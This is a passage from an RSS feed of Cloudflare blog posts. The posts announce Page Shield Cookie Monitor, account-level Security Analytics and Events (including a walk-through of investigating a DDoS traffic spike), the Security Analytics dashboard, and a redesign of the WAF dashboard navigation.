    <p>Growing concerns around user privacy has led browsers to start blocking third-party cookies by default. Led by <a href="https://blog.mozilla.org/en/products/firefox/todays-firefox-blocks-third-party-tracking-cookies-and-cryptomining-by-default/">Firefox</a> and <a href="https://www.theverge.com/2020/3/24/21192830/apple-safari-intelligent-tracking-privacy-full-third-party-cookie-blocking">Safari</a> a few years back, <a href="https://developers.google.com/privacy-sandbox/blog/cookie-countdown-2024jan">Google Chrome</a>, which currently has the <a href="https://radar.cloudflare.com/reports/browser-market-share-2023-q4">largest browser market share</a>, and whose parent company owns Google Ads, the <a href="https://w3techs.com/technologies/overview/advertising">dominant advertising network</a>, started restricting third-party cookies beginning in January of this year.</p><p>However, this does not mean the end of tracking users for advertising purposes; the technology has advanced allowing tracking to continue based on first-party cookies. Facebook Pixel, for example, started offering to set first-party cookies <i>alongside</i> third-party cookies <a href="https://www.inc.com/peter-roesler/facebook-to-allow-for-first-party-cookies-on-october-24th.html">in 2018</a> when being embedded in a website, in order “<a href="https://www.facebook.com/business/help/471978536642445?id=1205376682832142">to be more accurate in measurement and reporting</a>”.</p>
    <div>
      <h3>Scanning for cookies?</h3>
      <a href="#scanning-for-cookies">
        
      </a>
    </div>
    <p>To inventory all the cookies used when your website is accessed, you can open up any modern browser’s developer console and review which cookie is being set and sent back per HTTP request. However, collecting cookies with this approach won’t be practical unless your website is rather static, containing few external <a href="https://en.wikipedia.org/wiki/Snippet_(programming)">snippets</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/66MMjxkmwS1B9Ehtk8WPbN/2f29fa1bffaa14d0d574ed50e3a7078b/image1-22.png" />
            
            </figure><p><i>Screen capture of Chrome’s developer console listing cookies being set and sent back when visiting a website.</i></p><p>To resolve this, a cookie scanner can be used to automate cookie collection. Depending on your security setup, additional configurations are sometimes required in order to let the scanner bots pass through protection and/or authentication. This may open up a <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">potential attack surface</a>, which isn’t ideal.</p>
    <div>
      <h3>Introducing Page Shield Cookie Monitor</h3>
      <a href="#introducing-page-shield-cookie-monitor">
        
      </a>
    </div>
    <p>With Page Shield <a href="https://developers.cloudflare.com/page-shield/get-started/#activate-page-shield">enabled</a>, all the first-party cookies, whether set by your website or by external snippets, are collected and displayed in one place, no scanner required. With the click of a button, the full list can be exported in CSV format for further inventory processing.</p><p>If you run multiple websites like a marketing website and an admin console that require different cookie strategies, you can simply filter the list based on either domain or path, under the same view. This includes the websites that require authentication such as the admin console.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33L4FEvcR5LPp8YwkIfdxF/fcf093584fc5527286bce47470aac9cc/image3-19.png" />
            
            </figure><p><i>Dashboard showing a table of cookies seen, including key details such as cookie name, domain and path, and which host set the cookie.</i></p><p>To examine a particular cookie, clicking on its name takes you to a dedicated page that includes all the cookie attributes. Furthermore, similar to Script Monitor and Connection Monitor, we collect the first seen and last seen time and pages for easier tracking of your website’s behavior.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33eImaar9FKMDZVmt3f4s1/56f60b1478ae44dc0fcfb018367f2098/image4-22.png" />
            
            </figure><p><i>Detailed view of a captured cookie in the dashboard, including all cookie attributes as well as under which host and path this cookie has been set.</i></p><p>Last but not least, we are adding one more alert type specifically for newly seen cookies. When subscribed to this alert, we will notify you through either email or <a href="https://developers.cloudflare.com/notifications/get-started/configure-webhooks/">webhook</a> as soon as a new cookie is detected with all the details mentioned above. This allows you to trigger any workflow required, such as inventorying this new cookie for compliance.</p>
    <div>
      <h3>How Cookie Monitor works</h3>
      <a href="#how-cookie-monitor-works">
        
      </a>
    </div>
    <p>Let’s imagine you run an e-commerce website <code>example.com</code>. When a user logs in to view their ongoing orders, your website would send a header with key <code>Set-Cookie</code>, and value to identify each user’s login activity:</p><ul><li><p><code>login_id=ABC123; Domain=.example.com</code></p></li></ul><p>To analyze visitor behaviors, you make use of Google Analytics that requires embedding a code snippet in all web pages. This snippet will <a href="https://support.google.com/analytics/answer/11397207">set two more cookies</a> after the pages are loaded in the browser:</p><ul><li><p><code>_ga=GA1.2; Domain=.example.com;</code></p></li><li><p><code>_ga_ABC=GS1.3; Domain=.example.com;</code></p></li></ul><p>As these two cookies from Google Analytics are considered first-party given their domain attribute, they are automatically included together with the logged-in cookie sent back to your website. The final cookie sent back for a logged-in user would be <code>Cookie: login_id=ABC123; _ga=GA1.2; _ga_ABC=GS1.3</code> with three cookies concatenated into one string, even though only one of them is directly consumed by your website.</p><p>If your website happens to be <a href="https://developers.cloudflare.com/fundamentals/concepts/how-cloudflare-works/#with-cloudflare">proxied</a> through Cloudflare already, we will observe <i>one</i> <code>Set-Cookie</code> header with cookie name of <code>login_id</code> during response, while receiving <i>three</i> cookies back: <code>login_id</code>, <code>_ga</code>, and <code>_ga_ABC</code>. Comparing <i>one</i> cookie set with <i>three</i> returned cookies, the overlapping <code>login_id</code> cookie is then tagged as set by your website directly. The same principle applies to all the requests passing through Cloudflare, allowing us to build an overview of all the first-party cookies used by your websites.</p>
    <div>
      <h3>All cookies in one jar</h3>
      <a href="#all-cookies-in-one-jar">
        
      </a>
    </div>
    <p>Inventorying all cookies set through using your websites is a first step towards protecting your users’ privacy, and Page Shield makes this step just one click away. <a href="https://cloudflare.com/lp/pages-cookie-monitor/">Sign up now</a> to be notified when Page Shield Cookie Monitor becomes available!</p><p>...</p><p><sup>1</sup><a href="https://webkit.org/tracking-prevention/">Technically</a>, a first-party cookie is a cookie scoped to the given domain only (so not cross domain). Such a cookie can also be set by a third party snippet used by the website to the given domain.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7hEiD5Y4ZgRyZ2AuLkzH81</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[Account Security Analytics and Events: better visibility over all domains]]></title>
            <link>https://blog.cloudflare.com/account-security-analytics-and-events/</link>
            <pubDate>Sat, 18 Mar 2023 17:00:00 GMT</pubDate>
            <description><![CDATA[ Revealing Account Security Analytics and Events, new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there! ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hkEsUWDVJmPQ7DAieHQCS/6571ab358294597bd14e95b5f1feb5ed/Account-level-Security-Analytics-and-Security-Events_-better-visibility-and-control-over-all-account-zones-at-once.png" />
            
            </figure><p>Cloudflare offers many security features like <a href="https://developers.cloudflare.com/waf/">WAF</a>, <a href="https://developers.cloudflare.com/bots/">Bot management</a>, <a href="https://developers.cloudflare.com/ddos-protection/">DDoS</a>, <a href="https://developers.cloudflare.com/cloudflare-one/">Zero Trust</a>, and more! This suite of products are offered in the form of rules to give basic protection against common vulnerability attacks. These rules are usually configured and monitored per domain, which is very simple when we talk about one, two, maybe three domains (or what we call in Cloudflare’s terms, “zones”).</p>
    <div>
      <h3>The zone-level overview sometimes is not time efficient</h3>
      <a href="#the-zone-level-overview-sometimes-is-not-time-efficient">
        
      </a>
    </div>
    <p>If you’re a Cloudflare customer with tens, hundreds, or even thousands of domains under your control, you’d spend hours going through these domains one by one, monitoring and configuring all security features. We know that’s a pain, especially for our Enterprise customers. That’s why last September we announced the <a href="/account-waf/">Account WAF</a>, where you can create one security rule and have it applied to the configuration of all your zones at once!</p><p>Account WAF makes it easy to deploy security configurations. Following the same philosophy, we want to empower our customers by providing visibility over these configurations, or even better, visibility on all HTTP traffic.</p><p>Today, Cloudflare is offering holistic views on the security suite by launching Account Security Analytics and Account Security Events. Now, across all your domains, you can monitor traffic, get insights quicker, and save hours of your time.</p>
    <div>
      <h3>How do customers get visibility over security traffic today?</h3>
      <a href="#how-do-customers-get-visibility-over-security-traffic-today">
        
      </a>
    </div>
    <p>Before today, to view account analytics or events, customers either used to access each zone individually to check the events and analytics dashboards, or used zone <a href="https://developers.cloudflare.com/analytics/graphql-api/">GraphQL Analytics API</a> or logs to collect data and send them to their preferred storage provider where they could collect, aggregate, and plot graphs to get insights for all zones under their account — in case ready-made dashboards were not provided.</p>
    <div>
      <h3>Introducing Account Security Analytics and Events</h3>
      <a href="#introducing-account-security-analytics-and-events">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gWJhl65y6sUNRHNaZjwqt/d2a107ab79c0a3da65c4721a1b48fa74/Screenshot-2023-03-17-at-9.57.13-AM.png" />
            
            </figure><p>The new views are security focused, data-driven dashboards — similar to zone-level views, both have  similar data like: sampled logs and the top filters over many source dimensions (for example, IP addresses, Host, Country, ASN, etc.).</p><p>The main difference between them is that Account Security Events focuses on the current configurations on every zone you have, which makes reviewing mitigated requests (rule matches) easy. This step is essential in distinguishing between actual threats from false positives, along with maintaining optimal security configuration.</p><p>Part of the Security Events power is showing Events “by service” listing the security-related activity per security feature (for example, <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Firewall Rules, API Shield) and Events “by Action” (for example, allow, block, challenge).</p><p>On the other hand, Account Security Analytics view shows a wider angle with all HTTP traffic on all zones under the account, whether this traffic is mitigated, i.e., the security configurations took an action to prevent the request from reaching your zone, or not mitigated. This is essential in fine-tuning your security configuration, finding possible false negatives, or onboarding new zones.</p><p>The view also provides quick filters or insights of what we think are interesting cases worth exploring for ease of use. Many of the view components are similar to zone level <a href="/security-analytics/">Security Analytics</a> that we introduced recently.</p><p>To get to know the components and how they interact, let’s have a look at an actual example.</p>
    <div>
      <h3>Analytics walk-through when investigating a spike in traffic</h3>
      <a href="#analytics-walk-through-when-investigating-a-spike-in-traffic">
        
      </a>
    </div>
    <p>Traffic spikes happen to many customers’ accounts; to investigate the reason behind them, and check what’s missing from the configurations, we recommend starting from Analytics as it shows mitigated and non-mitigated traffic, and to revise the mitigated requests to double check any false positives then Security Events is the go to place. That’s what we’ll do in this walk-through starting with the Analytics, finding a spike, and checking if we need further mitigation action.</p><p><b>Step 1:</b> To navigate to the new views, sign into the Cloudflare dashboard and select the account you want to monitor. You will find <b>Security Analytics</b> and <b>Security Events</b> in the sidebar under <b>Security Center.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GQ2Z3yAa1OehelJegPHZU/ffc7db3bde4a6976ed94e6eab597458c/pasted-image-0--8--2.png" />
            
            </figure><p><b>Step 2:</b> In the Analytics dashboard, if you had a big spike in the traffic compared to the usual, there’s a big chance it's a layer 7 DDoS attack. Once you spot one, zoom into the time interval in the graph.</p><div></div>
<i>Zooming into a traffic spike on the timeseries scale</i><br /><p>By Expanding the top-Ns on top of the analytics page we can see here many observations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XDngTA5PHz7hc0O8f7RJ8/5bfe5659e3eafa42689d998f2de886a3/pasted-image-0--9--1.png" />
            
            </figure><p>We can confirm it’s a DDoS attack as the peak of traffic does not come from one single IP address, It’s distributed over multiple source IPs. The “edge status code” indicates that there’s a rate limiting rule applied on this attack and it’s a GET method over HTTP/2.</p><p>Looking at the right hand side of the analytics we can see “Attack Analysis” indicating that these requests were clean from <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, SQLi, and common RCE attacks. The Bot Analysis indicates it’s an automated traffic in the Bot Scores distribution; these two products add another layer of intelligence to the investigation process. We can easily deduce here that the attacker is sending clean requests through high volumetric attack from multiple IPs to take the web application down.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3mBN0yDIQo4aK0HAXCO5Yb/98fe973514f449147b3171e579c2dbce/pasted-image-0--10--1.png" />
            
            </figure><p><b>Step 3:</b> For this attack we can see we have rules in place to mitigate it, with the visibility we get the freedom to fine tune our configurations to have better security posture, if needed. we can filter on this attack fingerprint, for instance: add a filter on the referer `<a href="http://www.example.com`">www.example.com`</a> which is receiving big bulk of the attack requests, add filter on path equals `/`, HTTP method, query string, and a filter on the automated traffic with Bot score, we will see the following:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6bI1AAaTSFbA7nPxvx4lZn/2f8197708c7dc3ac8d842ff2c003b4eb/pasted-image-0--11-.png" />
            
            </figure><p><b>Step 4:</b> Jumping to Security Events to zoom in on our mitigation actions in this case, spike fingerprint is mitigated using two actions: Managed Challenge and Block.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6JuvFbzYoI01oHDIrCh7ze/3e21d9d444699434a28e25eea8422423/pasted-image-0--12-.png" />
            
            </figure><p>The mitigation happened on: Firewall rules and DDoS configurations, the exact rules are shown in the top events.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20ANCsBgB0TowOniXpMl0E/1e4445f96e05af157c3174314422513b/pasted-image-0--13-.png" />
            
            </figure>
    <div>
      <h3>Who gets the new views?</h3>
      <a href="#who-gets-the-new-views">
        
      </a>
    </div>
    <p>Starting this week all our customers on Enterprise plans will have access to Account Security Analytics and Security Events. We recommend having Account Bot Management, WAF Attack Score, and Account WAF to have access to the full visibility and actions.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>The new Account Security Analytics and Events encompass metadata generated by the Cloudflare network for all domains in one place. In the upcoming period we will be providing a better experience to save our customers' time in a simple way. We're currently in beta, log into the dashboard, check out the views, and let us know your feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7lBffZk4kfTbrZ48l1NMo8</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Security Analytics provides a comprehensive view across all your traffic]]></title>
            <link>https://blog.cloudflare.com/security-analytics/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fqA2JqcTEUftqWAiKfPHt/14eaa1a9b78a1785a3bd449a776eb204/unnamed-1.png" />
            
            </figure><p>An application proxying traffic through Cloudflare benefits from a wide range of easy to use security features including <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Bot Management and DDoS mitigation. To understand if traffic has been blocked by Cloudflare we have built a powerful <a href="/new-firewall-tab-and-analytics/">Security Events</a> dashboard that allows you to examine any mitigation events. Application owners often wonder though what happened to the rest of their traffic. Did they block all traffic that was detected as malicious?</p><p>Today, along with our announcement of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, we are also launching our new Security Analytics.</p><p>Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated.</p>
    <div>
      <h2>Detect then mitigate</h2>
      <a href="#detect-then-mitigate">
        
      </a>
    </div>
    <p>Imagine you just onboarded your application to Cloudflare and without any additional effort, each HTTP request is analyzed by the Cloudflare network. Analytics are therefore enriched with attack analysis, bot analysis and any other security signal provided by Cloudflare.</p><p>Right away, without any risk of causing false positives, you can view the entirety of your traffic to explore what is happening, when and where.</p><p>This allows you to dive straight into analyzing the results of these signals, shortening the time taken to deploy active blocking mitigations and boosting your confidence in making decisions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2gYype09S9vHFehn1Ltvln/a333ca9cdf3dd7397e9a012dbd758134/image6-1.png" />
            
            </figure><p>We are calling this approach “<i>detect then mitigate”</i> and we have already received very positive feedback from early access customers.</p><p>In fact, Cloudflare’s Bot Management has been <a href="/introducing-bot-analytics/">using this model</a> for the past two years. We constantly hear feedback from our customers that with greater visibility, they have a high confidence in our bot scoring solution. To further support this new way of securing your web applications and bringing together all our intelligent signals, we have designed and developed the new Security Analytics which starts bringing signals from the WAF and other security products to follow this model.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4GSZTeBSY0shIKt5dTE66k/fd166416500386e0549c6e7ad460bc8d/image4-6.png" />
            
            </figure>
    <div>
      <h2>New Security Analytics</h2>
      <a href="#new-security-analytics">
        
      </a>
    </div>
    <p>Built on top of the success of our analytics experiences, the new Security Analytics employs existing components such as top statistics, in-context quick filters, with a new page layout allowing for rapid exploration and validation. Following sections will break down this new page layout forming a high level workflow.</p><p>The key difference between Security Analytics and Security Events, is that the former is based on HTTP requests which covers visibility of your entire site’s traffic, while Security Events uses a different dataset that visualizes whenever there is a match with any active security rule.</p>
    <div>
      <h3>Define a focus</h3>
      <a href="#define-a-focus">
        
      </a>
    </div>
    <p>The new Security Analytics visualizes the dataset of sampled HTTP requests based on your entire application, same as <a href="/introducing-bot-analytics/">bots analytics</a>. When validating the “<i>detect then mitigate”</i> model with selected customers, a common behavior observed is to use the top N statistics to quickly narrow down to either obvious anomalies or certain parts of the application. Based on this insight, the page starts with selected top N statistics covering both request sources and request destinations, allowing expanding to view all the statistics available. Questions like “How well is my application admin’s area protected?” lands at one or two quick filter clicks in this area.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eVviZy7T8NtFwd5igw3Y7/a573e8bc96b2d8bc788ff483c1dc4189/image2-8.png" />
            
            </figure>
    <div>
      <h3>Spot anomalies in trends</h3>
      <a href="#spot-anomalies-in-trends">
        
      </a>
    </div>
    <p>After a preliminary focus is defined, the core of the interface is dedicated to plotting trends over time. The time series chart has proven to be a powerful tool to help spot traffic anomalies, also allowing plotting based on different criteria. Whenever there is a spike, it is likely an attack or attack attempt has happened.</p><p>As mentioned above, different from <a href="/new-firewall-tab-and-analytics/">Security Events</a>, the dataset used in this page is HTTP requests which includes both mitigated and not mitigated requests. By <a href="/application-security/#definitions">mitigated requests</a> here, we mean “any HTTP request that had a ‘terminating’ action applied by the Cloudflare platform”. The rest of the requests that have not been mitigated are either served by Cloudflare’s cache or reaching the origin. In the case such as a spike in not mitigated requests but flat in mitigated requests, an assumption could be that there was an attack that did not match any active WAF rule. In this example, you can one click to filter on not mitigated requests right in the chart which will update all the data visualized on this page supporting further investigations.</p><p>In addition to the default plotting of not mitigated and mitigated requests, you can also choose to plot trends of either attack analysis or bot analysis allowing you to spot anomalies for attack or bot behaviors.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68ZPoNtii7Si5DF06pxVVY/cec0589f2c78dc23cc9501cdb070bfa2/image7-2.png" />
            
            </figure>
    <div>
      <h3>Zoom in with analysis signals</h3>
      <a href="#zoom-in-with-analysis-signals">
        
      </a>
    </div>
    <p>One of the most loved and trusted analysis signals by our customers is the bot score. With the latest addition of <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a> and <a href="https://developers.cloudflare.com/waf/about/content-scanning/">content scanning</a>, we are bringing them together into one analytics page, helping you further zoom into your traffic based on some of these signals. The combination of these signals enables you to find answers to scenarios not possible until now:</p><ul><li><p>Attack requests made by (definite) automated sources</p></li><li><p>Likely attack requests made by humans</p></li><li><p>Content uploaded with/without malicious content made by bots</p></li></ul><p>Once a scenario is filtered on, the data visualization of the entire page including the top N statistics, HTTP requests trend and sampled log will be updated, allowing you to spot any anomalies among either one of the top N statistics or the time based HTTP requests trend.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L7LxXT1BLhWp71Im6heox/d8e9155a5e0e81f1bf0236a272509d0a/image3-3.png" />
            
            </figure>
    <div>
      <h3>Review sampled logs</h3>
      <a href="#review-sampled-logs">
        
      </a>
    </div>
    <p>After zooming into a specific part of your traffic that may be an anomaly, sampled logs provide a detailed view to verify your finding per HTTP request. This is a crucial step in a security study workflow backed by the high engagement rate when examining the usage data of such logs viewed in Security Events. While we are adding more data into each log entry, the expanded log view becomes less readable over time. We have therefore redesigned the expanded view, starting with how Cloudflare responded to a request, followed by our analysis signals, lastly the key components of the raw request itself. By reviewing these details, you validate your hypothesis of an anomaly, and if any mitigation action is required.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3gJjGLYzonj0aPVZLIKC6S/9cc34a61775198999e4f1eb8c4dd90f6/image5-3.png" />
            
            </figure>
    <div>
      <h3>Handy insights to get started</h3>
      <a href="#handy-insights-to-get-started">
        
      </a>
    </div>
    <p>When testing the prototype of this analytics dashboard internally, we learnt that the power of flexibility yields the learning curve upwards. To help you get started mastering the flexibility, a handy <i>insights</i> panel is designed. These insights are crafted to highlight specific perspectives into your total traffic. By a simple click on any one of the insights, a preset of filters is applied zooming directly onto the portion of your traffic that you are interested in. From here, you can review the sampled logs or further fine tune any of the applied filters. This approach has been proven with further internal studies of a highly efficient workflow that in many cases will be your starting point of using this dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1l8PBc150OLKligyn93h76/bc692e61e0f0d8c11ec1719c3195a169/image1-11.png" />
            
            </figure>
    <div>
      <h2>How can I get it?</h2>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>The new Security Analytics is being gradually rolled out to all Enterprise customers who have purchased the new Application Security Core or Advanced Bundles. We plan to roll this out to all other customers in the near future. This new view will be alongside the existing Security Events dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Q5OP1vAN2KM82LN4vBqp2/b7944b44d8d7bb03baa8b39909c72f16/image8-2.png" />
            
            </figure>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We are still at an early stage moving towards the “<i>detect then mitigate”</i> model, empowering you with greater visibility and intelligence to better protect your web applications. While we are working on enabling more detection capabilities, please share your thoughts and feedback with us to help us improve the experience. If you want to get access sooner, reach out to your account team to get started!</p> ]]></content:encoded>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">38y228bpRNFVIIfHyptrzx</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[A new WAF experience]]></title>
            <link>https://blog.cloudflare.com/new-waf-experience/</link>
            <pubDate>Tue, 15 Mar 2022 12:59:06 GMT</pubDate>
            <description><![CDATA[ The security landscape is moving fast. We invited users to help us shape a new WAF experience that enables us to evolve WAF to meet their demands and use cases ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5AshmKNvJcvQs9VcqUCAp8/b5128c88e4eb56e13d06b710e2b9861b/image2-28.png" />
            
            </figure><p>Around three years ago, we brought multiple features into the <a href="/new-firewall-tab-and-analytics/">Firewall tab</a> in our dashboard navigation, with the motivation “to make our products and services intuitive.” With our hard work in <a href="/tag/waf/">expanding capabilities offerings</a> in the past three years, we want to take another opportunity to evaluate the intuitiveness of <a href="https://www.cloudflare.com/waf/">Cloudflare WAF (Web Application Firewall)</a>.</p>
    <div>
      <h3>Our customers lead the way to new WAF</h3>
      <a href="#our-customers-lead-the-way-to-new-waf">
        
      </a>
    </div>
    <p>The security landscape is moving fast; types of web applications are growing rapidly; and within the industry there are various approaches to what a <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> includes and can offer. Cloudflare not only proxies enterprise applications, but also millions of personal blogs, community sites, and small businesses stores. The diversity of use cases are covered by various products we offer; however, these products are currently scattered and that makes visibility of active protection rules unclear. This pushes us to reflect on how we can best support our customers in getting the most value out of WAF by providing a clearer offering that meets expectations.</p><p>A few months ago, we reached out to our customers to answer a simple question: what do you consider to be part of WAF? We employed a range of user research methods including card sorting, tree testing, design evaluation, and surveys to help with this. The results of this research illustrated how our customers think about WAF, what it means to them, and how it supports their use cases. This inspired the product team to expand scope and contemplate what (Web Application) Security means, beyond merely the WAF.</p><p>Based on what hundreds of customers told us, our user research and product design teams collaborated with product management to rethink the security experience. We examined our assumptions and assessed the effectiveness of design concepts to create a structure (or information architecture) that reflected our customers’ mental models.</p><p>This new structure consolidates firewall rules, managed rules, and rate limiting rules to become a part of WAF. The new WAF strives to be the one-stop shop for web application security as it pertains to differentiating malicious from clean traffic.</p><p>As of today, you will see the following changes to our navigation:</p><ol><li><p><b>Firewall</b> is being renamed to <b>Security.</b></p></li><li><p>Under <b>Security,</b> you will now find <b>WAF.</b></p></li><li><p>Firewall rules, managed rules, and rate limiting rules will now appear under <b>WAF</b>.</p></li></ol><blockquote><p>From now on, when we refer to <b>WAF,</b> we will be referring to above three features.</p></blockquote><p>Further, some important updates are coming for these features. Advanced rate limiting rules will be launched as part of <a href="/welcome-security-week-2022/">Security Week</a>, and every customer will also get a free set of managed rules to <a href="/waf-for-everyone">protect all traffic from high profile vulnerabilities</a>. And finally, in the next few months, firewall rules will move to the <a href="https://developers.cloudflare.com/ruleset-engine/">Ruleset Engine</a>, adding more powerful capabilities thanks to the new Ruleset API. Feeling excited?</p>
    <div>
      <h3>How customers shaped the future of WAF</h3>
      <a href="#how-customers-shaped-the-future-of-waf">
        
      </a>
    </div>
    <p>Almost 500 customers participated in this user research study that helped us learn about needs and context of use. We employed four research methods, all of which were conducted in an unmoderated manner; this meant people around the world could participate remotely at a time and place of their choosing.</p><ul><li><p>Card sorting involved participants grouping navigational elements into categories that made sense to them.</p></li><li><p>Tree testing assessed how well or poorly a proposed navigational structure performed for our target audience.</p></li><li><p>Design evaluation involved a task-based approach to measure effectiveness and utility of design concepts.</p></li><li><p>Survey questions helped us dive deeper into results, as well as painting a picture of our participants.</p></li></ul><p>Results of this four-pronged study informed changes to both WAF and Security that are detailed below.</p>
    <div>
      <h3>The new WAF experience</h3>
      <a href="#the-new-waf-experience">
        
      </a>
    </div>
    <p>The final result reveals the WAF as part of a broader <a href="https://dash.cloudflare.com/?to=/:account/:zone/security">Security category</a>, which also includes Bots, DDoS, API Shield and Page Shield. This destination enables you to create your rules (a.k.a. firewall rules), deploy Cloudflare managed rules, set rate limit conditions, and includes handy tools to protect your web applications.</p><p>All customers across <a href="https://www.cloudflare.com/plans/">all plans</a> will now see the WAF products organized as below:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/777dWCpcmkac0c5KHZz4jp/6728da9e7d713d567a524faeb7f0b905/image1-29.png" />
            
            </figure><ol><li><p><b>Firewall rules</b> allow you to create custom, user-defined logic by blocking or allowing traffic that leverages all the components of the HTTP requests and dynamic fields computed by Cloudflare, such as Bot score.</p></li><li><p><b>Rate limiting rules</b> include the traditional IP-based product we launched back in 2018 and the newer Advanced Rate Limiting for ENT customers on the Advanced plan (coming soon).</p></li><li><p><b>Managed rules</b> allows customers to deploy sets of rules managed by the Cloudflare analyst team. These rulesets include a “Cloudflare Free Managed Ruleset” currently being rolled out <a href="/waf-for-everyone">for all plans</a> including FREE, as well as Cloudflare Managed, OWASP implementation, and Exposed Credentials Check for all paying plans.</p></li><li><p><b>Tools</b> give access to IP Access Rules, Zone Lockdown and User Agent Blocking. Although still actively supported, these products cover specific use cases that can be covered using firewall rules. However, they remain a part of the WAF toolbox for convenience.</p></li></ol>
    <div>
      <h3>Redesigning the WAF experience</h3>
      <a href="#redesigning-the-waf-experience">
        
      </a>
    </div>
    <p>Gestalt design principles suggest that “elements which are close in proximity to each other are perceived to share similar functionality or traits.” This principle in addition to the input from our customers informed our design decisions.</p><p>After reviewing the responses of the study, we understood the importance of making it easy to find the security products in the Dashboard, and the need to make it clear how particular products were related to or worked together with each other.</p><p>Crucially, the page needed to:</p><ul><li><p>Display each type of rule we support, i.e. firewall rules, rate limiting rules and managed rules</p></li><li><p>Show the usage amount of each type</p></li><li><p>Give the customer the ability to add a new rule and manage existing rules</p></li><li><p>Allow the customer to reprioritise rules using the existing drag and drop behavior</p></li><li><p>Be flexible enough to accommodate future additions and consolidations of WAF features</p></li></ul><p>We iterated on multiple options, including predominantly vertical page layouts, table based page layouts, and even accordion based page layouts. Each of these options, however, would force us to replicate buttons of similar functionality on the page. With the risk of causing additional confusion, we abandoned these options in favor of a horizontal, tabbed page layout.</p>
    <div>
      <h3>How can I get it?</h3>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>As of today, we are launching this new design of WAF to everyone! In the meantime, we are updating documentation to walk you through how to maximize the power of Cloudflare WAF.</p>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
    <p>This is a starting point of our journey to make Cloudflare WAF not only powerful but also easy to adapt to your needs. We are evaluating approaches to empower your decision-making process when protecting your web applications. Among growing intel information and more rules creation possibilities, we want to shorten your path from a possible threat detection (such as by security overview) to setting up the right rule to mitigate such threat. Stay tuned!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Firewall]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Product Design]]></category>
            <category><![CDATA[Design]]></category>
